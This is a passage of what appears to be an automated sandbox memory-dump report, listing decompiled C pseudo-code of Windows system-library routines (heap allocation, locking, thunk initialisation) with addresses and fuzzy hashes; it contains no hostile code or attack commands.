                                                              0x04c0a40b
                                                              0x04c0a40b
                                                              0x04c0a40f
                                                              0x04c0a415
                                                              0x04c0a423
                                                              0x04c0a423
                                                              0x04c0a415
                                                              0x04bcb3d1
                                                              0x04bcb3e8
                                                              0x04bcb3e8
                                                              0x04bcb3d9

                                                              Memory Dump Source
                                                              • Source File: 0000000D.00000002.620584407.0000000004B70000.00000040.00000001.sdmp, Offset: 04B70000, based on PE: true
                                                              • Associated: 0000000D.00000002.621218149.0000000004C8B000.00000040.00000001.sdmp Download File
                                                              • Associated: 0000000D.00000002.621265561.0000000004C8F000.00000040.00000001.sdmp Download File
                                                              Similarity
                                                              • API ID:
                                                              • String ID:
                                                              • API String ID:
                                                              • Opcode ID: ea8dd4c8638716e8240846a3a6680704f63cebaac80957f9179e3fb5f95170ce
                                                              • Instruction ID: 7b2dbad07ee4188a2f6864c46209cf8b87a89396c9ceacec5adf55bc72dada2e
                                                              • Opcode Fuzzy Hash: ea8dd4c8638716e8240846a3a6680704f63cebaac80957f9179e3fb5f95170ce
                                                              • Instruction Fuzzy Hash: 1A1121763152109BDB28AE259D82A6B7397EBC5234B2841ADDA169B680D932BC02C6D4
                                                              Uniqueness

                                                              Uniqueness Score: -1.00%

                                                              C-Code - Quality: 93%
                                                              			E04C146A7(signed short* __ecx, unsigned int __edx, char* _a4) {
                                                              				signed short* _v8;
                                                              				unsigned int _v12;
                                                              				intOrPtr _v16;
                                                              				signed int _t22;
                                                              				signed char _t23;
                                                              				short _t32;
                                                              				void* _t38;
                                                              				char* _t40;
                                                              
                                                              				_v12 = __edx;
                                                              				_t29 = 0;
                                                              				_v8 = __ecx;
                                                              				_v16 =  *((intOrPtr*)( *[fs:0x30] + 0x18));
                                                              				_t38 = L04BB4620(__ecx,  *((intOrPtr*)( *[fs:0x30] + 0x18)), 0,  *__ecx & 0x0000ffff);
                                                              				if(_t38 != 0) {
                                                              					_t40 = _a4;
                                                              					 *_t40 = 1;
                                                              					E04BDF3E0(_t38, _v8[2],  *_v8 & 0x0000ffff);
                                                              					_t22 = _v12 >> 1;
                                                              					_t32 = 0x2e;
                                                              					 *((short*)(_t38 + _t22 * 2)) = _t32;
                                                              					 *((short*)(_t38 + 2 + _t22 * 2)) = 0;
                                                              					_t23 = E04BCD268(_t38, 1);
                                                              					asm("sbb al, al");
                                                              					 *_t40 =  ~_t23 + 1;
                                                              					L04BB77F0(_v16, 0, _t38);
                                                              				} else {
                                                              					 *_a4 = 0;
                                                              					_t29 = 0xc0000017;
                                                              				}
                                                              				return _t29;
                                                              			}











                                                              0x04c146b7
                                                              0x04c146ba
                                                              0x04c146c5
                                                              0x04c146c8
                                                              0x04c146d0
                                                              0x04c146d4
                                                              0x04c146e6
                                                              0x04c146e9
                                                              0x04c146f4
                                                              0x04c146ff
                                                              0x04c14705
                                                              0x04c14706
                                                              0x04c1470c
                                                              0x04c14713
                                                              0x04c1471b
                                                              0x04c14723
                                                              0x04c14725
                                                              0x04c146d6
                                                              0x04c146d9
                                                              0x04c146db
                                                              0x04c146db
                                                              0x04c14732

                                                              Memory Dump Source
                                                              • Source File: 0000000D.00000002.620584407.0000000004B70000.00000040.00000001.sdmp, Offset: 04B70000, based on PE: true
                                                              • Associated: 0000000D.00000002.621218149.0000000004C8B000.00000040.00000001.sdmp Download File
                                                              • Associated: 0000000D.00000002.621265561.0000000004C8F000.00000040.00000001.sdmp Download File
                                                              Similarity
                                                              • API ID:
                                                              • String ID:
                                                              • API String ID:
                                                              • Opcode ID: 6c02f93804e98639f40e64f25065eaa58b5c60d6a79ebe6421c16f95bf281ade
                                                              • Instruction ID: 27dc3ecce757e85b50152d1ad2c8114f18c0ae0bcc8586809f234ba97a7c4b3b
                                                              • Opcode Fuzzy Hash: 6c02f93804e98639f40e64f25065eaa58b5c60d6a79ebe6421c16f95bf281ade
                                                              • Instruction Fuzzy Hash: AA11C272904208BBDB059F5DD8808BEB7B9EF95314F1080AAF9848B351DA319D55D7A4
                                                              Uniqueness

                                                              Uniqueness Score: -1.00%

                                                              C-Code - Quality: 94%
                                                              			E04BA766D(void* __ecx, signed int __edx, signed int _a4, signed int _a8, signed int _a12, intOrPtr* _a16) {
                                                              				char _v8;
                                                              				void* _t22;
                                                              				void* _t24;
                                                              				intOrPtr _t29;
                                                              				intOrPtr* _t30;
                                                              				void* _t42;
                                                              				intOrPtr _t47;
                                                              
                                                              				_push(__ecx);
                                                              				_t36 =  &_v8;
                                                              				if(E04BCF3D5( &_v8, __edx * _a4, __edx * _a4 >> 0x20) < 0) {
                                                              					L10:
                                                              					_t22 = 0;
                                                              				} else {
                                                              					_t24 = _v8 + __ecx;
                                                              					_t42 = _t24;
                                                              					if(_t24 < __ecx) {
                                                              						goto L10;
                                                              					} else {
                                                              						if(E04BCF3D5( &_v8, _a8 * _a12, _a8 * _a12 >> 0x20) < 0) {
                                                              							goto L10;
                                                              						} else {
                                                              							_t29 = _v8 + _t42;
                                                              							if(_t29 < _t42) {
                                                              								goto L10;
                                                              							} else {
                                                              								_t47 = _t29;
                                                              								_t30 = _a16;
                                                              								if(_t30 != 0) {
                                                              									 *_t30 = _t47;
                                                              								}
                                                              								if(_t47 == 0) {
                                                              									goto L10;
                                                              								} else {
                                                              									_t22 = L04BB4620(_t36,  *((intOrPtr*)( *[fs:0x30] + 0x18)), 8, _t47);
                                                              								}
                                                              							}
                                                              						}
                                                              					}
                                                              				}
                                                              				return _t22;
                                                              			}










                                                              0x04ba7672
                                                              0x04ba767f
                                                              0x04ba7689
                                                              0x04ba76de
                                                              0x04ba76de
                                                              0x04ba768b
                                                              0x04ba7691
                                                              0x04ba7693
                                                              0x04ba7697
                                                              0x00000000
                                                              0x04ba7699
                                                              0x04ba76a8
                                                              0x00000000
                                                              0x04ba76aa
                                                              0x04ba76ad
                                                              0x04ba76b1
                                                              0x00000000
                                                              0x04ba76b3
                                                              0x04ba76b3
                                                              0x04ba76b5
                                                              0x04ba76ba
                                                              0x04ba76bc
                                                              0x04ba76bc
                                                              0x04ba76c0
                                                              0x00000000
                                                              0x04ba76c2
                                                              0x04ba76ce
                                                              0x04ba76ce
                                                              0x04ba76c0
                                                              0x04ba76b1
                                                              0x04ba76a8
                                                              0x04ba7697
                                                              0x04ba76d9

                                                              Memory Dump Source
                                                              • Source File: 0000000D.00000002.620584407.0000000004B70000.00000040.00000001.sdmp, Offset: 04B70000, based on PE: true
                                                              • Associated: 0000000D.00000002.621218149.0000000004C8B000.00000040.00000001.sdmp Download File
                                                              • Associated: 0000000D.00000002.621265561.0000000004C8F000.00000040.00000001.sdmp Download File
                                                              Similarity
                                                              • API ID:
                                                              • String ID:
                                                              • API String ID:
                                                              • Opcode ID: 0f0f9780e106b949b133bc76075252866a2fc865c05abd63e27a9356099b865c
                                                              • Instruction ID: 200aa23b315f85857eff6bc50902622b3883adfc4ea47677cb9790dc13738482
                                                              • Opcode Fuzzy Hash: 0f0f9780e106b949b133bc76075252866a2fc865c05abd63e27a9356099b865c
                                                              • Instruction Fuzzy Hash: 1201D432718518AFD720AE5ECC40F6B77ADEB84760B2805A4B908CB241DE30EC1197A0
                                                              Uniqueness

                                                              Uniqueness Score: -1.00%

                                                              C-Code - Quality: 69%
                                                              			E04B99080(void* __ebx, intOrPtr* __ecx, void* __edi, void* __esi) {
                                                              				intOrPtr* _t51;
                                                              				intOrPtr _t59;
                                                              				signed int _t64;
                                                              				signed int _t67;
                                                              				signed int* _t71;
                                                              				signed int _t74;
                                                              				signed int _t77;
                                                              				signed int _t82;
                                                              				intOrPtr* _t84;
                                                              				void* _t85;
                                                              				intOrPtr* _t87;
                                                              				void* _t94;
                                                              				signed int _t95;
                                                              				intOrPtr* _t97;
                                                              				signed int _t99;
                                                              				signed int _t102;
                                                              				void* _t104;
                                                              
                                                              				_push(__ebx);
                                                              				_push(__esi);
                                                              				_push(__edi);
                                                              				_t97 = __ecx;
                                                              				_t102 =  *(__ecx + 0x14);
                                                              				if((_t102 & 0x02ffffff) == 0x2000000) {
                                                              					_t102 = _t102 | 0x000007d0;
                                                              				}
                                                              				_t48 =  *[fs:0x30];
                                                              				if( *((intOrPtr*)( *[fs:0x30] + 0x64)) == 1) {
                                                              					_t102 = _t102 & 0xff000000;
                                                              				}
                                                              				_t80 = 0x4c885ec;
                                                              				E04BB2280(_t48, 0x4c885ec);
                                                              				_t51 =  *_t97 + 8;
                                                              				if( *_t51 != 0) {
                                                              					L6:
                                                              					return E04BAFFB0(_t80, _t97, _t80);
                                                              				} else {
                                                              					 *(_t97 + 0x14) = _t102;
                                                              					_t84 =  *0x4c8538c; // 0x77f068c8
                                                              					if( *_t84 != 0x4c85388) {
                                                              						_t85 = 3;
                                                              						asm("int 0x29");
                                                              						asm("int3");
                                                              						asm("int3");
                                                              						asm("int3");
                                                              						asm("int3");
                                                              						asm("int3");
                                                              						asm("int3");
                                                              						asm("int3");
                                                              						asm("int3");
                                                              						asm("int3");
                                                              						asm("int3");
                                                              						asm("int3");
                                                              						asm("int3");
                                                              						_push(0x2c);
                                                              						_push(0x4c6f6e8);
                                                              						E04BED0E8(0x4c885ec, _t97, _t102);
                                                              						 *((char*)(_t104 - 0x1d)) = 0;
                                                              						_t99 =  *(_t104 + 8);
                                                              						__eflags = _t99;
                                                              						if(_t99 == 0) {
                                                              							L13:
                                                              							__eflags =  *((char*)( *((intOrPtr*)( *[fs:0x30] + 0xc)) + 0x28));
                                                              							if(__eflags == 0) {
                                                              								E04C688F5(_t80, _t85, 0x4c85388, _t99, _t102, __eflags);
                                                              							}
                                                              						} else {
                                                              							__eflags = _t99 -  *0x4c886c0; // 0x2e607b0
                                                              							if(__eflags == 0) {
                                                              								goto L13;
                                                              							} else {
                                                              								__eflags = _t99 -  *0x4c886b8; // 0x0
                                                              								if(__eflags == 0) {
                                                              									goto L13;
                                                              								} else {
                                                              									_t59 =  *((intOrPtr*)( *[fs:0x30] + 0xc));
                                                              									__eflags =  *((char*)(_t59 + 0x28));
                                                              									if( *((char*)(_t59 + 0x28)) == 0) {
                                                              										E04BB2280(_t99 + 0xe0, _t99 + 0xe0);
                                                              										 *(_t104 - 4) =  *(_t104 - 4) & 0x00000000;
                                                              										__eflags =  *((char*)(_t99 + 0xe5));
                                                              										if(__eflags != 0) {
                                                              											E04C688F5(0x4c885ec, _t85, 0x4c85388, _t99, _t102, __eflags);
                                                              										} else {
                                                              											__eflags =  *((char*)(_t99 + 0xe4));
                                                              											if( *((char*)(_t99 + 0xe4)) == 0) {
                                                              												 *((char*)(_t99 + 0xe4)) = 1;
                                                              												_push(_t99);
                                                              												_push( *((intOrPtr*)(_t99 + 0x24)));
                                                              												E04BDAFD0();
                                                              											}
                                                              											while(1) {
                                                              												_t71 = _t99 + 8;
                                                              												 *(_t104 - 0x2c) = _t71;
                                                              												_t80 =  *_t71;
                                                              												_t95 = _t71[1];
                                                              												 *(_t104 - 0x28) = _t80;
                                                              												 *(_t104 - 0x24) = _t95;
                                                              												while(1) {
                                                              													L19:
                                                              													__eflags = _t95;
                                                              													if(_t95 == 0) {
                                                              														break;
                                                              													}
                                                              													_t102 = _t80;
                                                              													 *(_t104 - 0x30) = _t95;
                                                              													 *(_t104 - 0x24) = _t95 - 1;
                                                              													asm("lock cmpxchg8b [edi]");
                                                              													_t80 = _t102;
                                                              													 *(_t104 - 0x28) = _t80;
                                                              													 *(_t104 - 0x24) = _t95;
                                                              													__eflags = _t80 - _t102;
                                                              													_t99 =  *(_t104 + 8);
                                                              													if(_t80 != _t102) {
                                                              														continue;
                                                              													} else {
                                                              														__eflags = _t95 -  *(_t104 - 0x30);
                                                              														if(_t95 !=  *(_t104 - 0x30)) {
                                                              															continue;
                                                              														} else {
                                                              															__eflags = _t95;
                                                              															if(_t95 != 0) {
                                                              																_t74 = 0;
                                                              																 *(_t104 - 0x34) = 0;
                                                              																_t102 = 0;
                                                              																__eflags = 0;
                                                              																while(1) {
                                                              																	 *(_t104 - 0x3c) = _t102;
                                                              																	__eflags = _t102 - 3;
                                                              																	if(_t102 >= 3) {
                                                              																		break;
                                                              																	}
                                                              																	__eflags = _t74;
                                                              																	if(_t74 != 0) {
                                                              																		L49:
                                                              																		_t102 =  *_t74;
                                                              																		__eflags = _t102;
                                                              																		if(_t102 != 0) {
                                                              																			_t102 =  *(_t102 + 4);
                                                              																			__eflags = _t102;
                                                              																			if(_t102 != 0) {
                                                              																				 *0x4c8b1e0(_t74, _t99);
                                                              																				 *_t102();
                                                              																			}
                                                              																		}
                                                              																		do {
                                                              																			_t71 = _t99 + 8;
                                                              																			 *(_t104 - 0x2c) = _t71;
                                                              																			_t80 =  *_t71;
                                                              																			_t95 = _t71[1];
                                                              																			 *(_t104 - 0x28) = _t80;
                                                              																			 *(_t104 - 0x24) = _t95;
                                                              																			goto L19;
                                                              																		} while (_t74 == 0);
                                                              																		goto L49;
                                                              																	} else {
                                                              																		_t82 = 0;
                                                              																		__eflags = 0;
                                                              																		while(1) {
                                                              																			 *(_t104 - 0x38) = _t82;
                                                              																			__eflags = _t82 -  *0x4c884c0;
                                                              																			if(_t82 >=  *0x4c884c0) {
                                                              																				break;
                                                              																			}
                                                              																			__eflags = _t74;
                                                              																			if(_t74 == 0) {
                                                              																				_t77 = E04C69063(_t82 * 0xc +  *((intOrPtr*)(_t99 + 0x10 + _t102 * 4)), _t95, _t99);
                                                              																				__eflags = _t77;
                                                              																				if(_t77 == 0) {
                                                              																					_t74 = 0;
                                                              																					__eflags = 0;
                                                              																				} else {
                                                              																					_t74 = _t77 + 0xfffffff4;
                                                              																				}
                                                              																				 *(_t104 - 0x34) = _t74;
                                                              																				_t82 = _t82 + 1;
                                                              																				continue;
                                                              																			}
                                                              																			break;
                                                              																		}
                                                              																		_t102 = _t102 + 1;
                                                              																		continue;
                                                              																	}
                                                              																	goto L20;
                                                              																}
                                                              																__eflags = _t74;
                                                              															}
                                                              														}
                                                              													}
                                                              													break;
                                                              												}
                                                              												L20:
                                                              												 *((intOrPtr*)(_t99 + 0xf4)) =  *((intOrPtr*)(_t104 + 4));
                                                              												 *((char*)(_t99 + 0xe5)) = 1;
                                                              												 *((char*)(_t104 - 0x1d)) = 1;
                                                              												goto L21;
                                                              											}
                                                              										}
                                                              										L21:
                                                              										 *(_t104 - 4) = 0xfffffffe;
                                                              										E04B9922A(_t99);
                                                              										_t64 = E04BB7D50();
                                                              										__eflags = _t64;
                                                              										if(_t64 != 0) {
                                                              											_t67 =  *((intOrPtr*)( *[fs:0x30] + 0x50)) + 0x22c;
                                                              										} else {
                                                              											_t67 = 0x7ffe0386;
                                                              										}
                                                              										__eflags =  *_t67;
                                                              										if( *_t67 != 0) {
                                                              											_t67 = E04C68B58(_t99);
                                                              										}
                                                              										__eflags =  *((char*)(_t104 - 0x1d));
                                                              										if( *((char*)(_t104 - 0x1d)) != 0) {
                                                              											__eflags = _t99 -  *0x4c886c0; // 0x2e607b0
                                                              											if(__eflags != 0) {
                                                              												__eflags = _t99 -  *0x4c886b8; // 0x0
                                                              												if(__eflags == 0) {
                                                              													_t94 = 0x4c886bc;
                                                              													_t87 = 0x4c886b8;
                                                              													goto L27;
                                                              												} else {
                                                              													__eflags = _t67 | 0xffffffff;
                                                              													asm("lock xadd [edi], eax");
                                                              													if(__eflags == 0) {
                                                              														E04B99240(_t80, _t99, _t99, _t102, __eflags);
                                                              													}
                                                              												}
                                                              											} else {
                                                              												_t94 = 0x4c886c4;
                                                              												_t87 = 0x4c886c0;
                                                              												L27:
                                                              												E04BC9B82(_t80, _t87, _t94, _t99, _t102, __eflags);
                                                              											}
                                                              										}
                                                              									} else {
                                                              										goto L13;
                                                              									}
                                                              								}
                                                              							}
                                                              						}
                                                              						return E04BED130(_t80, _t99, _t102);
                                                              					} else {
                                                              						 *_t51 = 0x4c85388;
                                                              						 *((intOrPtr*)(_t51 + 4)) = _t84;
                                                              						 *_t84 = _t51;
                                                              						 *0x4c8538c = _t51;
                                                              						goto L6;
                                                              					}
                                                              				}
                                                              			}




















                                                              0x04b99082
                                                              0x04b99083
                                                              0x04b99084
                                                              0x04b99085
                                                              0x04b99087
                                                              0x04b99096
                                                              0x04b99098
                                                              0x04b99098
                                                              0x04b9909e
                                                              0x04b990a8
                                                              0x04b990e7
                                                              0x04b990e7
                                                              0x04b990aa
                                                              0x04b990b0
                                                              0x04b990b7
                                                              0x04b990bd
                                                              0x04b990dd
                                                              0x04b990e6
                                                              0x04b990bf
                                                              0x04b990bf
                                                              0x04b990c7
                                                              0x04b990cf
                                                              0x04b990f1
                                                              0x04b990f2
                                                              0x04b990f4
                                                              0x04b990f5
                                                              0x04b990f6
                                                              0x04b990f7
                                                              0x04b990f8
                                                              0x04b990f9
                                                              0x04b990fa
                                                              0x04b990fb
                                                              0x04b990fc
                                                              0x04b990fd
                                                              0x04b990fe
                                                              0x04b990ff
                                                              0x04b99100
                                                              0x04b99102
                                                              0x04b99107
                                                              0x04b9910c
                                                              0x04b99110
                                                              0x04b99113
                                                              0x04b99115
                                                              0x04b99136
                                                              0x04b9913f
                                                              0x04b99143
                                                              0x04bf37e4
                                                              0x04bf37e4
                                                              0x04b99117
                                                              0x04b99117
                                                              0x04b9911d
                                                              0x00000000
                                                              0x04b9911f
                                                              0x04b9911f
                                                              0x04b99125
                                                              0x00000000
                                                              0x04b99127
                                                              0x04b9912d
                                                              0x04b99130
                                                              0x04b99134
                                                              0x04b99158
                                                              0x04b9915d
                                                              0x04b99161
                                                              0x04b99168
                                                              0x04bf3715
                                                              0x04b9916e
                                                              0x04b9916e
                                                              0x04b99175
                                                              0x04b99177
                                                              0x04b9917e
                                                              0x04b9917f
                                                              0x04b99182
                                                              0x04b99182
                                                              0x04b99187
                                                              0x04b99187
                                                              0x04b9918a
                                                              0x04b9918d
                                                              0x04b9918f
                                                              0x04b99192
                                                              0x04b99195
                                                              0x04b99198
                                                              0x04b99198
                                                              0x04b99198
                                                              0x04b9919a
                                                              0x00000000
                                                              0x00000000
                                                              0x04bf371f
                                                              0x04bf3721
                                                              0x04bf3727
                                                              0x04bf372f
                                                              0x04bf3733
                                                              0x04bf3735
                                                              0x04bf3738
                                                              0x04bf373b
                                                              0x04bf373d
                                                              0x04bf3740
                                                              0x00000000
                                                              0x04bf3746
                                                              0x04bf3746
                                                              0x04bf3749
                                                              0x00000000
                                                              0x04bf374f
                                                              0x04bf374f
                                                              0x04bf3751
                                                              0x04bf3757
                                                              0x04bf3759
                                                              0x04bf375c
                                                              0x04bf375c
                                                              0x04bf375e
                                                              0x04bf375e
                                                              0x04bf3761
                                                              0x04bf3764
                                                              0x00000000
                                                              0x00000000
                                                              0x04bf3766
                                                              0x04bf3768
                                                              0x04bf37a3
                                                              0x04bf37a3
                                                              0x04bf37a5
                                                              0x04bf37a7
                                                              0x04bf37ad
                                                              0x04bf37b0
                                                              0x04bf37b2
                                                              0x04bf37bc
                                                              0x04bf37c2
                                                              0x04bf37c2
                                                              0x04bf37b2
                                                              0x04b99187
                                                              0x04b99187
                                                              0x04b9918a
                                                              0x04b9918d
                                                              0x04b9918f
                                                              0x04b99192
                                                              0x04b99195
                                                              0x00000000
                                                              0x04b99195
                                                              0x00000000
                                                              0x04bf376a
                                                              0x04bf376a
                                                              0x04bf376a
                                                              0x04bf376c
                                                              0x04bf376c
                                                              0x04bf376f
                                                              0x04bf3775
                                                              0x00000000
                                                              0x00000000
                                                              0x04bf3777
                                                              0x04bf3779
                                                              0x04bf3782
                                                              0x04bf3787
                                                              0x04bf3789
                                                              0x04bf3790
                                                              0x04bf3790
                                                              0x04bf378b
                                                              0x04bf378b
                                                              0x04bf378b
                                                              0x04bf3792
                                                              0x04bf3795
                                                              0x00000000
                                                              0x04bf3795
                                                              0x00000000
                                                              0x04bf3779
                                                              0x04bf3798
                                                              0x00000000
                                                              0x04bf3798
                                                              0x00000000
                                                              0x04bf3768
                                                              0x04bf379b
                                                              0x04bf379b
                                                              0x04bf3751
                                                              0x04bf3749
                                                              0x00000000
                                                              0x04bf3740
                                                              0x04b991a0
                                                              0x04b991a3
                                                              0x04b991a9
                                                              0x04b991b0
                                                              0x00000000
                                                              0x04b991b0
                                                              0x04b99187
                                                              0x04b991b4
                                                              0x04b991b4
                                                              0x04b991bb
                                                              0x04b991c0
                                                              0x04b991c5
                                                              0x04b991c7
                                                              0x04bf37da
                                                              0x04b991cd
                                                              0x04b991cd
                                                              0x04b991cd
                                                              0x04b991d2
                                                              0x04b991d5
                                                              0x04b99239
                                                              0x04b99239
                                                              0x04b991d7
                                                              0x04b991db
                                                              0x04b991e1
                                                              0x04b991e7
                                                              0x04b991fd
                                                              0x04b99203
                                                              0x04b9921e
                                                              0x04b99223
                                                              0x00000000
                                                              0x04b99205
                                                              0x04b99205
                                                              0x04b99208
                                                              0x04b9920c
                                                              0x04b99214
                                                              0x04b99214
                                                              0x04b9920c
                                                              0x04b991e9
                                                              0x04b991e9
                                                              0x04b991ee
                                                              0x04b991f3
                                                              0x04b991f3
                                                              0x04b991f3
                                                              0x04b991e7
                                                              0x00000000
                                                              0x00000000
                                                              0x00000000
                                                              0x04b99134
                                                              0x04b99125
                                                              0x04b9911d
                                                              0x04b9914e
                                                              0x04b990d1
                                                              0x04b990d1
                                                              0x04b990d3
                                                              0x04b990d6
                                                              0x04b990d8
                                                              0x00000000
                                                              0x04b990d8
                                                              0x04b990cf

                                                              Memory Dump Source
                                                              • Source File: 0000000D.00000002.620584407.0000000004B70000.00000040.00000001.sdmp, Offset: 04B70000, based on PE: true
                                                              • Associated: 0000000D.00000002.621218149.0000000004C8B000.00000040.00000001.sdmp Download File
                                                              • Associated: 0000000D.00000002.621265561.0000000004C8F000.00000040.00000001.sdmp Download File
                                                              Similarity
                                                              • API ID:
                                                              • String ID:
                                                              • API String ID:
                                                              • Opcode ID: 5e847ff99a4e681d2de607e2a8234594ba19b5b3616840c160a69086ccbd351b
                                                              • Instruction ID: 25403085aa12669bc180bc3c692dc37c4cf6b487c58ee05d8a44290aa7294eb6
                                                              • Opcode Fuzzy Hash: 5e847ff99a4e681d2de607e2a8234594ba19b5b3616840c160a69086ccbd351b
                                                              • Instruction Fuzzy Hash: 9A01F4B2601210AFE7189F24D840B217BE9EF41328F2140BEE111DB791C3B4FC41CBA0
                                                              Uniqueness

                                                              Uniqueness Score: -1.00%

                                                              C-Code - Quality: 46%
                                                              			E04C2C450(intOrPtr* _a4) {
                                                              				signed char _t25;
                                                              				intOrPtr* _t26;
                                                              				intOrPtr* _t27;
                                                              
                                                              				_t26 = _a4;
                                                              				_t25 =  *(_t26 + 0x10);
                                                              				if((_t25 & 0x00000003) != 1) {
                                                              					_push(0);
                                                              					_push(0);
                                                              					_push(0);
                                                              					_push( *((intOrPtr*)(_t26 + 8)));
                                                              					_push(0);
                                                              					_push( *_t26);
                                                              					E04BD9910();
                                                              					_t25 =  *(_t26 + 0x10);
                                                              				}
                                                              				if((_t25 & 0x00000001) != 0) {
                                                              					_push(4);
                                                              					_t7 = _t26 + 4; // 0x4
                                                              					_t27 = _t7;
                                                              					_push(_t27);
                                                              					_push(5);
                                                              					_push(0xfffffffe);
                                                              					E04BD95B0();
                                                              					if( *_t27 != 0) {
                                                              						_push( *_t27);
                                                              						E04BD95D0();
                                                              					}
                                                              				}
                                                              				_t8 = _t26 + 0x14; // 0x14
                                                              				if( *((intOrPtr*)(_t26 + 8)) != _t8) {
                                                              					L04BB77F0( *((intOrPtr*)( *[fs:0x30] + 0x18)), 0,  *((intOrPtr*)(_t26 + 8)));
                                                              				}
                                                              				_push( *_t26);
                                                              				E04BD95D0();
                                                              				return L04BB77F0( *((intOrPtr*)( *[fs:0x30] + 0x18)), 0, _t26);
                                                              			}






                                                              0x04c2c458
                                                              0x04c2c45d
                                                              0x04c2c466
                                                              0x04c2c468
                                                              0x04c2c469
                                                              0x04c2c46a
                                                              0x04c2c46b
                                                              0x04c2c46e
                                                              0x04c2c46f
                                                              0x04c2c471
                                                              0x04c2c476
                                                              0x04c2c476
                                                              0x04c2c47c
                                                              0x04c2c47e
                                                              0x04c2c480
                                                              0x04c2c480
                                                              0x04c2c483
                                                              0x04c2c484
                                                              0x04c2c486
                                                              0x04c2c488
                                                              0x04c2c48f
                                                              0x04c2c491
                                                              0x04c2c493
                                                              0x04c2c493
                                                              0x04c2c48f
                                                              0x04c2c498
                                                              0x04c2c49e
                                                              0x04c2c4ad
                                                              0x04c2c4ad
                                                              0x04c2c4b2
                                                              0x04c2c4b4
                                                              0x04c2c4cd

                                                              Memory Dump Source
                                                              • Source File: 0000000D.00000002.620584407.0000000004B70000.00000040.00000001.sdmp, Offset: 04B70000, based on PE: true
                                                              • Associated: 0000000D.00000002.621218149.0000000004C8B000.00000040.00000001.sdmp Download File
                                                              • Associated: 0000000D.00000002.621265561.0000000004C8F000.00000040.00000001.sdmp Download File
                                                              Similarity
                                                              • API ID: InitializeThunk
                                                              • String ID:
                                                              • API String ID: 2994545307-0
                                                              • Opcode ID: efb8dbafbc21be99c6828cd6b94329c97088fdc8e1727ade4875afce538aa955
                                                              • Instruction ID: ef286b9356bd0cbb232a2fd8b342b99a4a561adf4a92806edb949e832e56bc13
                                                              • Opcode Fuzzy Hash: efb8dbafbc21be99c6828cd6b94329c97088fdc8e1727ade4875afce538aa955
                                                              • Instruction Fuzzy Hash: 5F01DEB2140A05BFE721AF25CD80EB7FB6EFF94798F004165F24446560DB62BCA0CAE0
                                                              Uniqueness

                                                              Uniqueness Score: -1.00%

                                                              C-Code - Quality: 86%
                                                              			E04C64015(signed int __eax, signed int __ecx) {
                                                              				void* __ebx;
                                                              				void* __edi;
                                                              				signed char _t10;
                                                              				signed int _t28;
                                                              
                                                              				_push(__ecx);
                                                              				_t28 = __ecx;
                                                              				asm("lock xadd [edi+0x24], eax");
                                                              				_t10 = (__eax | 0xffffffff) - 1;
                                                              				if(_t10 == 0) {
                                                              					_t1 = _t28 + 0x1c; // 0x1e
                                                              					E04BB2280(_t10, _t1);
                                                              					 *((intOrPtr*)(_t28 + 0x20)) =  *((intOrPtr*)( *[fs:0x18] + 0x24));
                                                              					E04BB2280( *((intOrPtr*)( *[fs:0x18] + 0x24)), 0x4c886ac);
                                                              					E04B9F900(0x4c886d4, _t28);
                                                              					E04BAFFB0(0x4c886ac, _t28, 0x4c886ac);
                                                              					 *((intOrPtr*)(_t28 + 0x20)) = 0;
                                                              					E04BAFFB0(0, _t28, _t1);
                                                              					_t18 =  *((intOrPtr*)(_t28 + 0x94));
                                                              					if( *((intOrPtr*)(_t28 + 0x94)) != 0) {
                                                              						L04BB77F0( *((intOrPtr*)( *[fs:0x30] + 0x18)), 0, _t18);
                                                              					}
                                                              					_t10 = L04BB77F0( *((intOrPtr*)( *[fs:0x30] + 0x18)), 0, _t28);
                                                              				}
                                                              				return _t10;
                                                              			}







                                                              0x04c6401a
                                                              0x04c6401e
                                                              0x04c64023
                                                              0x04c64028
                                                              0x04c64029
                                                              0x04c6402b
                                                              0x04c6402f
                                                              0x04c64043
                                                              0x04c64046
                                                              0x04c64051
                                                              0x04c64057
                                                              0x04c6405f
                                                              0x04c64062
                                                              0x04c64067
                                                              0x04c6406f
                                                              0x04c6407c
                                                              0x04c6407c
                                                              0x04c6408c
                                                              0x04c6408c
                                                              0x04c64097

                                                              Memory Dump Source
                                                              • Source File: 0000000D.00000002.620584407.0000000004B70000.00000040.00000001.sdmp, Offset: 04B70000, based on PE: true
                                                              • Associated: 0000000D.00000002.621218149.0000000004C8B000.00000040.00000001.sdmp Download File
                                                              • Associated: 0000000D.00000002.621265561.0000000004C8F000.00000040.00000001.sdmp Download File
                                                              Similarity
                                                              • API ID:
                                                              • String ID:
                                                              • API String ID:
                                                              • Opcode ID: aba02cd4d195e23efc8e1826f5a91301eeead7cd481cb2631e57e3815e5d1cf5
                                                              • Instruction ID: a6296fb9c60afa7bd56bfb11c80d47b97f1a8899f7e91a2872d2f99e7c41f813
                                                              • Opcode Fuzzy Hash: aba02cd4d195e23efc8e1826f5a91301eeead7cd481cb2631e57e3815e5d1cf5
                                                              • Instruction Fuzzy Hash: 2D018F722419457FE615BB69CD84E63B7ACEF85668B0006A9B508C7A11CB64FC11CAE4
                                                              Uniqueness

                                                              Uniqueness Score: -1.00%

                                                              C-Code - Quality: 61%
                                                              			E04C514FB(intOrPtr __ebx, intOrPtr __ecx, intOrPtr __edx, intOrPtr _a4, intOrPtr _a8) {
                                                              				signed int _v8;
                                                              				intOrPtr _v16;
                                                              				intOrPtr _v20;
                                                              				intOrPtr _v24;
                                                              				intOrPtr _v28;
                                                              				short _v54;
                                                              				char _v60;
                                                              				void* __edi;
                                                              				void* __esi;
                                                              				signed char* _t21;
                                                              				intOrPtr _t27;
                                                              				intOrPtr _t33;
                                                              				intOrPtr _t34;
                                                              				signed int _t35;
                                                              
                                                              				_t32 = __edx;
                                                              				_t27 = __ebx;
                                                              				_v8 =  *0x4c8d360 ^ _t35;
                                                              				_t33 = __edx;
                                                              				_t34 = __ecx;
                                                              				E04BDFA60( &_v60, 0, 0x30);
                                                              				_v20 = _a4;
                                                              				_v16 = _a8;
                                                              				_v28 = _t34;
                                                              				_v24 = _t33;
                                                              				_v54 = 0x1034;
                                                              				if(E04BB7D50() == 0) {
                                                              					_t21 = 0x7ffe0388;
                                                              				} else {
                                                              					_t21 =  *((intOrPtr*)( *[fs:0x30] + 0x50)) + 0x22e;
                                                              				}
                                                              				_push( &_v60);
                                                              				_push(0x10);
                                                              				_push(0x20402);
                                                              				_push( *_t21 & 0x000000ff);
                                                              				return E04BDB640(E04BD9AE0(), _t27, _v8 ^ _t35, _t32, _t33, _t34);
                                                              			}

















                                                              0x04c514fb
                                                              0x04c514fb
                                                              0x04c5150a
                                                              0x04c51514
                                                              0x04c51519
